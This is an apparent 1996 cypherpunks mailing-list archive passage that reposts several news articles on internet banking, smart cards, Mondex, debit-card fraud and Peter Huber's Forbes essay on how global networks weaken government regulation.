chief executive officers don't know much about personal computers, pay
more attention to commercial loan spreads and credit card profitability
than
to information technology, and still need convincing to pour a lot of
investment capital into creating the aforementioned future. 
 
The vision of the possible appeared at American Banker's second annual
conference on financial services in cyberspace. After three days of
almost
boundless enthusiasm for electronic cash and virtual banking, these
concepts
didn't sound futuristic at all. 
 
Stirring up a revival-meeting atmosphere, Mondex USA chairman Dudley
Nigg referred to Internet banking as "the Holy Grail." But no longer does
he
consider it beyond bankers' grasp. Giving the opening speech Monday, the
Wells Fargo Bank executive vice president decried the industry's past sin
of
"giving away the branch channel for free and charging for on-line service
...
How ludicrous!" 
 
After Wells saw the light and dropped its fees for PC users, on-line
customers jumped from 20,000 in early 1995 to 270,000 today -- 110,000
of them via the Internet. Mr. Nigg expects two million Internet customers
in
five years. 
 
It provides an unusual opening, he said, to "satisfy customer needs
(while) we
lower our costs ... That's the kind of economics that chairmen in our
industry
love to hear about, and is rare in banking. Rare is the channel where
costs
can be driven down." 
 
Mr. Nigg, speaking the same day MasterCard announced its acquisition of
51% of Mondex International, a smart card program he fervently supports,

lived up to his keynote billing with the conference's most quotable
quote: "If
we don't get aboard this train early, we will miss it." 
 
He said technology is advancing so quickly and decisively that bankers no
longer have the luxury of waiting for lower prices or more definitive
outcomes
before making a move. 
 
"If we regard this as purely hype, we will forfeit this opportunity to
others
who are waiting in the wings," Mr. Nigg said. "We have traditionally been
slow to step up. In the past, second-movers had an opportunity to meet
the
train. Today, people are waiting for us to act. If we don't do so,
somebody
else will step in and take our place." 
 
"Don't do nothing, waiting to see if Internet commerce is real," said
Verifone
Inc. vice president Roger Bertman, picking up the theme two days later
when
discussing bank-merchant relationships. "It is absolutely clear you will
miss an
opportunity and risk losing pieces of your merchant portfolios." 
 
The Internet and personal financial management software like Intuit
Inc.'s
Quicken are "wedges driving financial services into the home," said Adam
Schoenfeld, vice president of publishing at Jupiter Communications in New
York. 
 
Though many attempts at electronic financial services were "poorly
conceived
and executed," he said, banks are serving two million customers by PC,
and
more than three times that number express interest in the medium,
according
to a recent Jupiter-Find/SVP study. 
 
Veterans of earlier, unsuccessful attempts at revolutionizing banking
behavior
like to bat around ideas on why the 1990s are different. 
 
One obvious reason is the breakneck spread of personal computers into
consumers' homes. Huntington Bancshares senior vice president William
Randle, a conference co-chairman, cited an October survey that said 19
million U.S. households now use home computers for some aspect of
financial management. 
 
He also showed a commercial that touted the home banking capabilities of
Packard Bell's products. "When manufacturers of computers start
advertising
banking as an application, times are moving fast," he concluded. 
 
There were other ideas as well. Gaurang Desai, a vice president at
Montgomery Securities, said vendors and bankers are growing more
comfortable with one another and are working together more productively.
Henry Lichstein, a vice president and technology strategist at Citibank,
said
banks are learning how to market on-line services so they are attractive
to
consumers. 
 
Pointing out that Citibank has offered home banking for a decade, he said
the
program began "in earnest" last year when the bank stopped charging for
it.
 
In 1996, Mr. Lichstein said, "the big change was the Internet." 
 
And David Frankel, banking business manager at the Prodigy on-line
service,
recalled that when his company introduced on-line banking in 1988, it
fell flat.
 
Prodigy has spent the last eight months reconstructing its service for
the
Internet. "People are moving to the Internet directly at almost alarming
speed," Mr. Frankel said. "We have recognized the future of the Internet
and
the ultimate demise of proprietary on-line services." 
 
Several speakers predicted that the introduction this year of television
sets
with Web browsers will jump-start home banking for the mass of consumers.
 
In the Jupiter Communications survey, 25% of households with personal
computers said they "would prefer to get their electronic financial
services
through the television," said Mr. Schoenfeld. 
 
Mr. Lichstein defined the task at hand -- "the process of anticipating
change
and aligning oneself to it" -- as "finding the strategic groove." 
 
Something is in a strategic groove, he said, when "if we do not step up
to the

challenge, someone else will." By that definition, Mr. Nigg was
describing
strategic grooves for the Internet and smart cards, particularly Mondex,
which can operate as both a real-world cash substitute and a
virtual-world
payment transmission device. 
 
Mr. Lichstein put smart cards and consumer electronic banking in that
very
context. "The strategic groove in home banking," he said, "is in full
swing." 
 
Critical or dissenting voices were pretty much drowned out. Charlotte
Wingfield, a KPMG Peat Marwick partner, said she got a respectful
reception to what she called the only presentation covering the biggest
mode
of banking distribution -- the branch. 
 
Citing a consumer survey KPMG commissioned from Yankelovich Partners,
Ms. Wingfield concluded that "the branch's demise is greatly
exaggerated."
Her data indicated that even frequent PC users put "banking in person"
ahead
of software-based services on their list of preferences. 
 
Agreeing with Ms. Wingfield, a member of the audience who works for a
technology company grumbled about the pro-virtual majority. "They make it
sound like everybody has to be on the Internet by next Tuesday, or
they're
toast. That just isn't the case." 
 
Even a bank executive from the Northeast who is well versed in the
Internet
and intranets said, "I think it's all hype." 
 
In one session that devolved into a small-scale cat fight among software
vendors, a Microsoft Corp. executive was trying to take the high road:
Other
purveyors of personal financial management software divulged the number
of
users they had doing on-line banking, but he wasn't going to play the
numbers
game. 
 
A representative of Intuit said 400,000 people were banking on-line
through
Quicken and BankNow. The chief executive of Meca Software said he had
200,000 active users. 
 
When Microsoft's turn came, Richard Bray, a product manager, kept
insisting that 10% of Microsoft Money users were doing on-line banking.
When pressed for specific numbers, he would go no further. 
 
Unluckily for Mr. Bray, he was also scheduled to speak again later in the
day
about the Microsoft Network for the Internet. It was in that speech that
he
casually said: "Two and a half million people use Microsoft Money." 
 
And 10% of 2.5 million would be ... William N. Melton, founder and
president of Cybercash Inc., was torn within himself. He took a break
from
the American Banker conference to fly to the giant Comdex computer trade
show in Las Vegas and returned with what he termed a "manic-depressive
problem."
 
When he first arrived in Scottsdale, he became "manic" when he learned
that
the bankers there had apparently gotten religion on the subject of the
Internet. 
 
"We've been trying to talk to bankers for a long time, and said, 'The
Internet
is really here,"' he said. "I didn't think they were really getting it."
 
After jetting off to Comdex, though, he became "depressed" that while the
250,000 people attending the show were "all doing nothing but thinking
about
the Internet," they didn't seem to be moving quickly enough toward
on-line
commerce. 
 
"We've been working on SET (the Secure Electronic Transactions protocol)
for one to one and a half years, and hopefully within six months we'll
have
interoperability tests," Mr. Melton said with some disdain. 
 
After returning to Arizona, Mr. Melton swung back to manic mode. Hearing
details about MasterCard's buy into Mondex persuaded him that "maybe it's
going to happen." 
 
Mr. Melton was emphatic about what was needed to help make "it" happen:
he called on banks to "unilaterally issue digital certificates" to get
customers
accustomed to on-line commerce and comfortable with evolving privacy and
security measures. 
 

Mr. Melton and Mr. Bertman, general manager of the Internet commerce
division at Verifone (another company Mr. Melton founded), acknowledged
some other impediments or potential obstacles.
 
"By 2000, the privacy issue will have really hit," Mr. Melton predicted.
He
said the negative consequences of such an explosive political issue could
be
mitigated by banks' convincing the public they have addressed it. But he
warned of "a huge public debate." 
 
Mr. Bertman said the industry must help consumers and merchants make
sense of a dizzying array of payment methods and options. Verifone and
Cybercash, among others, have proposed "virtual wallets" as a solution. 
 
"Technologists tend to oversimplify the payments world," he said, "but
there
are some very complex issues" that financial institutions are best placed
to
resolve. 
 
Mr. Bertman added that while most discussions have focused on the on-
line
consumer, bank-merchant relationships are at least as critical and have
been
"underestimated and under-understood." 
 
"There is a question of how many banks do you need on the Internet," Mr.
Melton said. "This is not a polite question, but it's going to become
very
competitive - more so than in the physical world where you are protected
by
the walls of geography." 
 
Mr. Melton was ready to declare victory on the security issue, saying,
"It's
essentially done." 
 
Given the availability of data encryption techniques and specifications
like
SET, which is being developed by MasterCard and Visa, he said: "Tell your
customers, 'Don't worry. We'll take care of it'." 
 
Mr. Bertman said the SET development process will take well into next
year,
but the card industry should move ahead with Internet payments." Sholom
Rosen, a vice president at Citibank who has invented a computer-
to-computer electronic money system, raised a red flag. 
 
He said electronic currencies like those being promoted for the Internet
--
Citibank's is not among them -- raise security issues different from
those in
conventional commerce, and they are not fully addressed by "strong
encryption and protocols." 
 
For example, Mr. Rosen said, counterfeit losses are conventionally borne
by
the party who is discovered passing fake currency. In on-line commerce,
the
issuer of money -- likely a bank -- is the victim, with consequences for
solvency and systemic risk that Mr. Rosen said haven't been thought
through.
 
Mr. Rosen stated in an interview that Mr. Melton and others are in an
"entrepreneurial mode" and understandably eager to embrace exciting new
things. 
 
"Comdex is fine, but banks are in the business of having to manage
risks,"
Mr. Rosen said. 
 


ABA Banking Journal: November, 1996
 
Are You "Toast"? 
 
By William W. Streeter
 
Has anyone walked up to you recently and said, "You're toast"? As you
might surmise, the question has nothing to do with sun or food. It has to
do
with history, as in, "You're history, pal."
 
And that's how author Don Tapscott meant it when he used the expression
in
his presentation at the ABA Annual Convention last month. 
 
He was speaking about the digital revolution, and with the single word
"toast," he likely captured the collective angst of most people in the
room. 
 
As author of the best-selling book, The Digital Economy, Tapscott is a
prophet of the new order resulting from the digitizing of information.
Like
many of his ilk, his presentation was both mesmerizing and unsettling. He
spoke of the likely disappearance of entire industries under the
onslaught of
the Internet, specifically referencing travel agents and food
wholesalers. 
 
He didn't foretell that fate for banking, but he did speak of the
"disintermediation" of the middleman. 
 

"If you're in the middleman business, start looking for a job," he said. 
 
It shouldn't take long to realize that banking falls under that heading. 
Consider
that traditional banking is deposit intermediation, while the more recent
additions to the business have largely been brokerage. Sounds like a
"middleman" business to us. 
 
Tapscott urged bankers to "reintermediate." We haven't a clue what that
means, but he did cite examples of several banks that have embraced the
Internet -- Security First Network Bank being one (look for an update on
it
next month); Wells Fargo and The Bank of Montreal being two others. 
 
There's no denying that certain business have been displaced by
electronics.
The advent of desktop publishing software, for example, radically altered
the
"pre-press" and typesetting business that thrived pretty much since
Gutenberg. Typesetting in particular was wiped out by computers in the
space of about ten years. The function of putting words into type didn't
disappear, it was simply transferred to publications' staffs, at a
considerable
savings. 
 
Those publications themselves face a challenge with the emergence of the
Internet as a radically different means of disseminating information. 
 
Is banking similarly challenged? The answer without a doubt is "yes."
Will the
industry disappear like the typesetters? There are two considerations in
answering that question. First, the typesetting business disappeared
because
electronics gave publishers greater flexibility at less cost. The same
case is
made by proponents of banking via the Internet, but it's not clear yet
whether
a majority of people and businesses are ready to do banking that way. 
 
Second, "banking" and "industry" are labels. The functions performed
under
those labels will of course continue as long as there is money, or more
broadly, exchange of value. 
 
If by being "digitized" a product or service or process becomes more
convenient, more flexible, or less expensive, the marketplace will
embrace it.
And it will probably do so pretty quickly. 
 
None of this says that there won't be a need for people to meet with
people.
Maybe many "face-to-face" meetings will occur by high-quality video
connection. But all of them won't. There will still be a need to be
reassured
about something in person; to shake hands on a deal; or to look someone
in
the eye -- a live eye. 
 
As a proxy for this, consider that e-mail hasn't eliminated the need to
speak
by phone, any more than telephones eliminated the need to write or to see
someone in person. 
 
Changes in fundamental technology have always caused business casualties
-- as with the proverbial buggy whip example. 
 
Part of top management's job is to stay abreast of changing technology,
and
to hire and train people who can communicate in, and deal with, whatever
medium is appropriate. The difference now is that the change to a digital
age
will bring more far-reaching changes than anything seen recently, and is
occurring at dizzying speed. 
 
For sure, money isn't likely to go away soon, and neither, therefore, is
financial services. That should ease some of the angst you may feel under
the
relentless barrage of "The Digital Age." But don't get comfortable
either, or
you will be toast. 


Retail Delivery Systems News: November 22, 1996
 
Mondex Deal Changes MasterCard Strategy
 
Expect some turmoil in the smart card market as MasterCard International,
of New York, readjusts its strategy in the wake of buying a majority
interest
in Mondex, of London, a bank partnership formed to pilot smart cards in
England. 
 
The long-time rumored acquisition represents one of the largest
investments
of a U.S. company in smart card technology.
 
Estimates are that MasterCard paid between $100 million and $150 million
for the majority interest. 
 
MasterCard will adopt Mondex's technology as its strategic chip platform,
the companies say. 
 
This raises questions for the future of pilots, such as the one planned
in New
York City's West Side by Citibank and Chase Manhattan and for the
validity of vendor hardware and software created to work with MasterCash,

analysts say. The New York pilot, which is meant to prove
interoperability of
the MasterCard and Visa systems, already has been delayed until the
second
quarter of 1997. 
 
Additionally, MasterCard has lost several of its key officers in the
MasterCash division, raising questions about who is leading the venture,
RDSN has learned. 
 
"A number of companies would like to see a crystallization of
MasterCard's
strategy with smart cards," says Dave Lott, an analyst with Dove
Associates
in Atlanta. "The deal raises a lot of questions in terms of what are they
going
to do with the product (MasterCash) that they've developed up to this
time." 
 

 
Washington Post: Sunday, November 24, 1996
 
The Uncertain Value of 'Smart Cards' 
 
By Jane Bryant Quinn
 
The next piece of plastic the banks think you ought to keep in your
wallet is a
"smart card." These cards come in several varieties and most aren't ready
for
mass distribution. But pilot projects are forging ahead in Atlanta and
New
York City early next year, and in Canada and several countries abroad. 
 
There's no obvious consumer need for smart cards today. But the bankers
believe that you're going to love them anyway. You may even be mailed one
and urged to try it. 
 
Smart card promoters make the assumption that you hate to carry cash. You
hate fishing for bills and coins to buy a newspaper or a soda. You'd put
down plastic, instead. 
 
This plastic card has money on it, embedded in a computer chip. A $ 20
card, for example, will give you $ 20 in spending power. 
 
If you buy a 75-cent newspaper, the seller will put your card in a
special
terminal and drain off 75 cents. No identification or signature is
required. 
 
You now have a card with $ 19.25 left on it. After spending $ 1 on a
soda,
the value of your card goes down to $ 18.25. If you forget the amount,
you
can check it with a little portable card reader. Some readers also might
list
the last five things you bought. 
 

Don't confuse a smart card with a debit card. When you pay by debit card,
money is moved automatically from your bank account into the merchant's
bank account. With a smart card, however, you first move money from your
bank account onto the card's computer chip. When you buy something, the
money moves from your card to the merchant's terminal and then,
electronically, to the merchant's bank. 
 
If every merchant, street vendor, taxi driver and bus accepted smart
cards,
you wouldn't have to carry cash. To some, that would be a huge
convenience; to others, it's a shrug. But as long as some merchants took
smart cards and others didn't, you'd have to carry both. 
 
Smart cards come in three varieties, some of them more flexible than
others: 
 
* A prepaid, disposable single-purpose card. Telephone cards are a good
example. You pay $ 10 or $ 20 for a card, dial an 800-number, give the
number of your card and then make your telephone call. Minute by minute,
the cost of the call is deducted from the value of the card. When you've
spent
all the money on the card, you throw it out. 
 
* A prepaid, disposable bank card. You buy the card at a bank and can use
it at any store that has a terminal. 
 
* A reloadable card. When your money runs out, you can take it to a bank,
an automated teller machine or a special kiosk and load it up again.
Visa,
MasterCard, Citibank and the Chase Manhattan bank will jointly test a
reloadable card in a section of New York City next year. A reloadable
card
also could serve as your credit card, debit card or ATM card. 
 
What's in it for the banks? Eventually (although not at first), the banks
probably would charge you for the card. There might be a fee when you
used
an ATM to load it up. The merchant also would pay a fee, in return for
getting what is presumably a more secure transaction. 
 
What's in it for consumers? A very little bit of convenience. Putting
down a
card is a tad quicker than fishing out cash. You always have the
equivalent of
exact change. You wouldn't have to count your change, but you'd have to
use the card reader to be sure the merchant's terminal deducted the right
amount. You may or may not pay more for the card than it costs to get
cash
from an ATM. 
 
For a while, the smart cards probably won't have any more than $ 100 on
them and the limit might be lower. So they're strictly for walking-around
money. You'd still need your credit card, debit card or checkbook for
more
serious shopping. 
 
If the card malfunctions -- say, it registers $ 14 when you're sure you
were
carrying $ 36 -- a bank can check the balance on the computer chip, says
Ron Braco, a senior vice president at Chase Manhattan. But if you lose
the
card, it's just like losing cash. You're out the money. 
 
Promoters of smart cards promise a lot of national and international uses
that
aren't yet anywhere in sight. I'll probably wait for them. Banks have a
sales
job to do on people like me who don't find it a nuisance to carry cash.
 
 


Forbes: December 2, 1996
 
Banks are pushing new ATM cards that doubleas a Visa or a MasterCard.
Avoid 'em.
 
Carte Blanche For Crooks 
 
By Alexandra Alger 
 
Chances are that yet another chunk of unsolicited plastic has popped up
in
your mailbox. It is not just another credit card. It's a combination new
ATM
card and charge card. You can use it to withdraw cash from automated
teller
machines, as you do with your current ATM card. Or you can use it to
charge purchases, without having to use your PIN (personal identification
number). "It's as convenient as a credit card, but it's not credit! The
amount
of your purchase is immediately deducted from the balance in your
checking

account," says the brochure sent out by one major bank. And therein lies
the
danger--it's a debit card. We don't like it for three reasons: 
 
* It could give a thief carte blanche to your checking account. In case
of
fraudulent use of your debit card, you are the one who is instantly
out-of-pocket, not the bank. You may have to fight the bank to recover
your
money, and you could lose it completely if you don't report the loss
right
away. Meanwhile, your bank balance and credit line could be depleted, and
your checks could be bouncing all over town. 
 
* You lose the credit float, of 30 days or so, that you get with a
zero-balance
credit card. 
 
* You lose the option of withholding payments--important leverage in case
of
disputed charges. 
 
Banks are flooding the mails with these new cards. Visa has launched a
multimillion-dollar national TV campaign to promote its debit cards,
starring
football superstar Deion Sanders. Some 4,000 U.S. banks, S&Ls and credit
unions are issuing MasterCard- and Visa-affiliated debit cards--double
the
number of a year ago. Most of the nation's biggest banks have already
joined
the party, including California's Bank of America and New York's Chase
Manhattan Corp. (to its new Chemical Bank customers). Citibank is
planning its blitz next year. 
 
For banks, what's not to like? Merchants pay card issuers an
"interchange"
fee--typically 1% to 2% of the transaction value. Some banks even charge
customers $1 to $1.50 a month just to have the card. 
 
Debit cards also help wean bank customers from costly check-writing. It
costs banks $1.10 or so to process every check, but only 27 cents to
handle
a debit card transaction, says Edward Neumann, director of Dove
Associates, a bank consulting firm in Washington, D.C. 
 
Bankers insist that the cards are good for customers, too. "The key is
convenience--that's what we're selling," says John Russell, a spokesman
for
Banc One in Columbus, Ohio, the first bank to offer a debit card and now
the largest issuer of them (over 4 million). 
 
But we think this convenience comes at too high a risk. Some debit- card
crooks are subtle. They'll use swiped debit cards occasionally, charging
up
relatively small amounts. As long as the account holders overlook the
charges
on their bank statements, the party continues. The thief has a kind of
annuity. 
 
Roy Funderburk Jr. learned about this the hard way. The 53-year-old mail
carrier from Alexandria, Va. was going over his bank statement when he
noticed two debit-card charges in one day at an Exxon station he
occasionally used in Washington, D.C. That sent him back to statements
for
previous months. What he found were $1,000 in bogus gas station charges
made over a nine-month period. No charge was more than $20. He hadn't
lost his Visa debit card, so was baffled about the misuse. 
 
Funderburk's branch manager at American Security Bank (now
NationsBank) told him not to worry, he would be reimbursed for his
losses.
But a month later Funderburk got word that he'd only be recompensed for
the fraudulent charges made within the previous 60 days-- $247. He was
out
$761. Funderburk was furious. He went to the Washington Police
Department, the Secret Service--even the FBI. The latter two told him
they
only looked into cases involving at least $5,000. 
 
Finally, on the advice of a lawyer, he took the bank to small-claims
court. He
struck out there, too; the judge shook his head and told Funderburk the
bank
didn't owe him anything under federal bank rules, and there was nothing
he
could do. 
 
The story has a happy ending. Out of the blue, an American Security
lawyer
called Funderburk about settling. Funderburk said he just wanted his
money

back, without interest. Fine, the attorney said. Within hours the money
was
back in his checking account. But what an ordeal! 
 
How had the thief pulled off the thefts? All he needed to get started was
the
number on Funderburk's debit card, perhaps from a discarded receipt. A
phony card could be made, using that number. 
 
Still, Funderburk was lucky. Banks will normally assume liability for
fraudulent use only if you notify them within two days after you miss
your
card. In that case your loss is limited to $50--often, you won't be
charged at
all. But wait any longer, and you could be liable for as much as $500 of
your
own checking account losses. If you fail to report the fraud within 60
days,
the bank doesn't have to give you a cent. 
 
Your chances of getting hit are uncomfortably high. Last year Visa and
MasterCard issuers shouldered $19 million in fraud-related losses on
their
debit cards, says the Nilson Report, an industry newsletter in Oxnard,
Calif.
PIN-related ATM fraud accounts for $100 million to $200 million in annual
losses. 
 
That is small potatoes compared with the estimated $3 billion in annual
credit-card fraud losses (FORBES, Aug. 26). But, says John Wisniewski, a
postal inspector in Pittsburgh:"The bad guys are just starting to figure
out how
to misuse them."
 
One of the more ingenious ATM scams involved a bogus telephone. At an
ATM in Miami, Fla. crooks put plastic sleeves into the card slots. When
customers saw their cards were swallowed by the machine, they picked up
the telephone provided to dial the posted customer service number. 
 
But the phone was provided by the thieves, and the posted number put
customers in touch with a thief, not a bank employee. The thief then
asked
customers for their PIN as identification and promised that replacement
cards
would be mailed out in a matter of days. 
 
The crooks then plucked out the stuck ATM cards with tweezers and were
off to the races. 
 
Our advice is to avoid the ATM-debit card. When your ATM card expires,
request a simple replacement instead of the new combo card you'll be
mailed. In our view, the risks of the combo far outweigh the potential
rewards. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Tue, 26 Nov 1996 09:16:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961126.111614.12279.1.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



Forbes: December 2, 1996
 
Cyberpower 
 
By Peter Huber 
 
James Carville once wisecracked that he wanted to be reincarnated as the
bond market. What did he mean by that? He meant that modern,
electronically connected markets are more powerful than any politician.
To
put it another way: The modem is redefining democracy. 
 
British Telecom timed its announcement perfectly--on the eve of the
election.
Think of BT's $20 billion merger with MCI as an antidote to bad
government. By providing efficient, integrated global data connections,
telecommunication companies now offer voters the ultimate shopping
experience: shopping for better government. 
 
Travel the wires and see what I mean. To a degree that may astound you,
your computer and your telephone enable you to choose what you like in
the
way of Federal Reserve, FDIC, SEC, FDA, OSHA, EEOC, NLRB or
other cans in the alphabet soup aisles of modern regulation. 
 
The idea of choosing government is not, of course, new. If you don't like
California law on the subject, you drive to Reno for marriage, divorce or
gambling. To Mexico to buy cut-rate medicines unapproved in the U.S. To
Florida to go bankrupt or to die. The urge to take a political hike has
been
there all along. What has changed is the ease and convenience. 
 
In the past you had to vote with your feet. Now you can vote with your
modem, too. The Web supplies an instant global storefront. While the U.S.
market still dominates the Internet, 36% of servers are now outside this

country. Virtual establishments on the Web already offer incorporation in
Belize, bank accounts in Switzerland, currency trading in Germany,
brokerage accounts in New Zealand. International 800 numbers are
proliferating. 
 
Money, the most liquid of assets, has become the hardest to regulate.
Rich
people have always parked their money abroad when they didn't trust the
political climate at home. Today millions of ordinary investors can move
their
wealth between currencies and countries as fast as they can click icons
on a
screen. 
 
For some this is just an opportunity to cheat on their taxes. A Hamburg
currency trader promises "tax-free profits." A Swiss on-line banker
emphasizes "banking secrecy" and "protecting the privacy of bank
clients."
Swiss safe deposit boxes, the bank assures you, "cannot be sealed by
foreign
authorities in case of civil offenses." Other on-line offshore entities
brazenly
tout "tax-free" advantages for U.S. depositors. 
 
But evading tax collectors remains a sideshow in the vast business of
international, wired finance. The center of the action involves the
completely
legal evasion of inept central bankers. More than $1 trillion in foreign
exchange changes hands each day around the world. (By comparison,
turnover of all stocks on the New York Stock Exchange for an entire year
is
only around $4 trillion.) One in seven equity trades in today's world
involves
a foreigner as a counterparty. And even illiquid assets--real estate, for
example--are increasingly being securitized and then traded on global
markets. 
 
As Walter Wriston, former Citicorp chief executive and author of The
Twilight of Sovereignty (Charles Scribner's Sons, 1992), says:
"Governments
have lost control of the international value of their currency." A single
integrated world market for tradable financial assets is taking shape.
Lowell
Bryan and Diana Farrell of McKinsey & Co. describe this evolution in
Market Unbound: Unleashing Global Capitalism (John Wiley & Sons, 1996).
 
The upshot? The prudent investor can now select investments based on the
central bankers standing behind them, just as he now chooses a stock
based
on his appraisal of the chief executive officer. Do you think the German
central bank is wavering? Try Alan Greenspan. If you think he is on the
wrong track, try New Zealand. Global mutual funds have limitless ability
to
move capital among local, state, national and international
portfolios--equity,
debt, currencies, futures, the lot. By far the most effective way to vote

against
new government spending is to buy some other government's bonds. This
kind of balloting is in fact conducted continually--by banks, pension
funds
and mutual funds. These are the new, private treasuries. 
 
By dispatching its capital elsewhere, the electorate can almost instantly
depress the economy and thus the government's tax revenues. For any
government that's seriously in debt, the globalization of financial
markets puts
a double squeeze on new discretionary spending. If global capitalists
lose
faith and drive up interest rates, it isn't just new spending that costs
more, 
it's
also the refinancing of old debt. The modemization of finance explains
the
federal government's mass conversion to more balanced budgets. 
 
As Bryan and Farrell discuss in their book, the tremendous new mobility
of
private capital sharply curtails government power over macroeconomic
policy. Budget planners and central bankers become little more than fancy
bookkeepers. They don't orchestrate economic forces, they react to them. 
 
Whether they talk left or right, governments worldwide have little choice
but
to abandon fiscally suicidal policies, most notably the practice of
issuing

long-term debt to finance current entitlements. Improvident governments
that
don't believe this end up like Mexico in 1995, with a collapsing peso and
an
overnight flight of capital. Even Washington's wisest understand the new
reality. "I used to think if there was reincarnation I wanted to come
back as
the President, the Pope or a .400 baseball hitter," Clinton adviser James
Carville quipped two years ago. "But now I want to come back as the bond
market. You can intimidate everybody." 
 
Including, of course, government regulators. Wires are imposing a strict
new
discipline on the regulators of private banks, too. At a recent Cato
Institute
conference on the future of money, University of Georgia economist
Lawrence H. White described how new payment technologies have lowered
the cost of wiring money from $20 to 2 cents per transaction. This opens
up
the world of offshore banking to small investors--and it's all perfectly
legal, 
so
long as you keep paying your income taxes. Offshore banks pay higher
interest on deposits and charge lower rates on loans because they aren't
subject to the wide array of bank taxes, mandatory insurance premiums and
antiredlining decrees imposed by U.S. regulators. For the first time,
small
depositors can decide for themselves whether the Federal Deposit
Insurance
Corp. is really worth the price they pay in less favorable interest
rates. 
 
Securities regulation can now easily be circumvented in much the same
way.
With stock exchanges and brokerage accounts moving on-line, you can hold
and trade U.S. equities completely outside U.S. jurisdiction. If the
Securities
& Exchange Commission goes over the edge of the regulatory Laffer
Curve--by passing rules that stifle rather than protect--investors will
easily 
be
able to move to a Swiss broker, a London exchange or a Canadian
commodities trader. The value of regulation, positive or negative,
becomes
something you shop around for, just as you shop for a trusty broker or
low
trading fees. 
 
Labor will never be as fluid as capital, but does follow it. The 1980s
taught
us that manufacturing jobs could escape U.S. unions, labor laws, tort
lawyers
and environmental regulators much more easily than we had realized. The
aluminum still comes from an Alcoa mill in the U.S., but some 20% of the
Boeing 777 airframe structure is built by Japanese workers at a
Kawasaki/Mitsubishi/Fuji consortium. The wings and the cockpit of
McDonnell Douglas' MD-95 are being built in South Korea. 
 
To be sure, most U.S. jobs, particularly the services that account for
54% of
the U.S. economy, are still in nontradable sectors. If you live in
Fresno, you
can't easily get a haircut from a coiffeur in France. But services do
already
make up over 20% of global trade, and they represent the fastest-growing
component of both trade and foreign direct investment worldwide. American
companies outsource data entry to countries in the Caribbean.
Manufacturers
outsource product design, logistics management, R&D and customer service
across national borders, too. U.S. insurance, tax consulting and
accounting
companies send claims and forms overseas for processing. Software, films,
music, finance, advertising, and even health care and education all move
as
well. Haircuts? Not yet, but there's already serious talk of
telemedicine. 
 
The Boeing way of choosing labor is now embedded in the structure of some
39,000 large, transnational corporations, which collectively hold over
$2.7
trillion of assets outside their home-base countries. New foreign direct
investment in the 26 nations in the Organization for Economic Cooperation
&
Development rose by 53% in 1995, while outflows from these countries
increased by 42%. (For cross-border holdings of tradable securities, see

chart, p. 146.) "The very phrase `international trade' has begun to sound
obsolete," Wriston says in an interview. 
 
Again, information and communications technologies are the critical new
lubricant. Many services, especially financial and anything involving
software,
consist of nothing but information and can be moved by wire alone. Moving
solid goods still requires cheap transportation, too, but the cost of
hauling
things around keeps dropping, energy costs notwithstanding. And many of
the products being hauled--everything from cameras to cars--keep getting
smaller and lighter as they get electronically smarter. 
 
Once a manager in Detroit learns how to use the telecosm to outsource to
Toledo, Ohio, she can outsource to Toledo, Spain; with cyber power all
physical distances are roughly the same. And with this kind of global
production system in place, a manufacturing company can move jobs and
capital around like pieces on a chessboard, shopping continually for the
best-priced labor--and the best labor laws. As Norman Macrae, former
deputy editor of the Economist, foresaw some years ago, corporations of
the
future are not going to be nationally based, and they "aren't going to
have
long-lasting lines of production in settled places." Their managers will
be able
to move jobs almost as fast as governments can rewrite employment laws.
At
the margin, the managers of these transnational companies will adjust
their
portfolios of labor in much the same way as the manager of the Templeton
Growth Fund trades stocks.
 
So where does the globalization of labor markets leave the countless
national
regulators of employment and work? Whatever they address-- parental
leave, handicaps or the minimum wage--laws that deny economic reality
cannot be enforced if the jobs can pick up and leave. Much as they hate
the
fact, government bureaucrats are beginning to accept it. Yes, Washington
did
recently raise the minimum wage, but the real story there was how little
and
how late. The long-term global political trend is away from all such
dictates,
not toward them. 
 
When she thinks of herself as "labor" the average American citizen may
not
like this at all. But as a consumer she's collaborating enthusiastically.
She
buys Nikes and Nintendos made in Asian factories. She demands profit from
her mutual fund and pension plan, not patriotic loss. Before long, she'll
shop
for life insurance in London and health insurance in Geneva, and the
offshore
actuaries will discriminate fiercely in favor of the healthy. In the
1980s the
chief executive of Chrysler might have decided to buy a few million car
engines from Korea. Today millions of individual Americans are gaining
the
power to shop anywhere they please. No longer can consumers, any more
than investors or corporate managers, be economically quarantined. 
 
This means that consumer protection regulators face serious competition.
An
abortion now comes in a pill; there's little to stop you from buying that
from
an on-line pharmacy in Monaco if you have to. For years the FDA blocked
sales of kits that allowed home testing for the AIDS virus. So a South
African
company peddled a $100 kit on the Internet, with delivery by mail. And
the
owner boasted openly that he was in business to thwart the regulators
overseas. 
 
The daughter of a magazine editor I know needed a special asthma drug
that
the Food & Drug Administration hasn't yet seen fit to approve. Her dad
E-mailed a contact in Paris, and the medicine arrived by air several days
later. He would not have bought a drug from China or Belize, but he was
willing to trust France. The world's drug regulators, in short, compete
for his
custom. A wide range of routine diagnostic services could easily be
offered

to U.S. citizens from laboratories in Bermuda. The Web would handle
marketing and payment. Federal Express would deliver. 
 
What holds for lab tests holds for morals and culture, too. Nevada can
dispatch strip shows and blackjack tables to any computer in Utah. If we
shut down Nevada, gaming houses farther afield will quickly fill the
electronic
void. A two-minute Web search turns up the Aruba Palms, off the coast of
Venezuela. Download free software and link into the hotel's casino for
real-time blackjack, poker and slots, as well as full sports-book action.
Or
try out any of a dozen on-line gambling alternatives in Argentina,
Belize,
Antigua or the U.K. Or play the national lottery of Liechtenstein. Use
your
credit card, or use E-cash if you want to make both gains and losses
completely anonymous. 
 
When it comes to pure content regulation--pornography the most vivid
example--government authorities have lost their grip completely. If you
don't
like Utah's censors, three clicks of a mouse will put you under the
unbuttoned
authority of Utrecht. Canada has instructed its citizens not to watch too
much
U.S. television. But it's laughably easy now for Canadians to buy a small
satellite dish and get subscription fees billed to a nominally U.S.
address.
Technology has rendered completely obsolete the very idea that government
authorities can control morality and culture. Politicians may still give 
speeches
about these things, but everyone knows the talk is just reactionary
twaddle. 
 
All of this should be very reassuring. Most of us won't leave the
country, not
in person and not by wire. We won't have to. Competition improves the
quality of everything else; it will improve the quality of government,
too. Most
politicians are pragmatists. They'll grasp that they have to deliver a
good
service at an attractive price--or lose market share to the competition.
Bill
